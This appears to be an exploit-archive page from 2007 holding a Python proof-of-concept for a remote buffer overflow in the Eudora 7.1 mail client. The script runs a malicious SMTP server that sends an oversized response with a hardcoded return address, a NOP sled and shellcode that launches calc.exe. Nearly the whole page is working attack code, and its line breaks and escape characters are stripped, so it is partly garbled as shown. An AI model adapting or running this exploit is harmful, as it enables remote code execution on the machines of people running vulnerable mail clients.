Home / exploits eudora71-overflow.txt
Posted on 17 May 2007
#!/usr/bin/python # Eudora 7.1 SMTP Response 0day Remote Buffer Overflow PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on Eudora 7.1.0.9 / XP SP2 Polish # Shellcode type: Windows Execute Command (calc.exe) # Note:.. # This vulnerability can be exploited only if user # will ignore warning about "buffer overflow" error. ## from struct import pack from time import sleep from socket import * bind_addr = '0.0.0.0' bind_port = 25 shellcode = ( "x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8" "x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1" "xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07" "xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25" "x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5" "x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d" "x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4" "xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0" "xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c" "x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b" "x27x41x13x88xbbx0cx17x9cxbdx22x72xe4") opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish) buf = "250-" buf += "A" * 76 buf += pack("<L", opcode) buf += "x90" * 32 buf += shellcode buf += " " s = socket(AF_INET, SOCK_STREAM) s.bind((bind_addr, bind_port)) s.listen(1) print "Listening on %s:%d..." % (bind_addr, bind_port) cl, addr = s.accept() print "Connected accepted from: %s" % (addr[0]) cl.send('220 Dupa Jasia ') print cl.recv(1024)[:-1] cl.send(buf) sleep(1) cl.close() s.close() print "Done" # EoF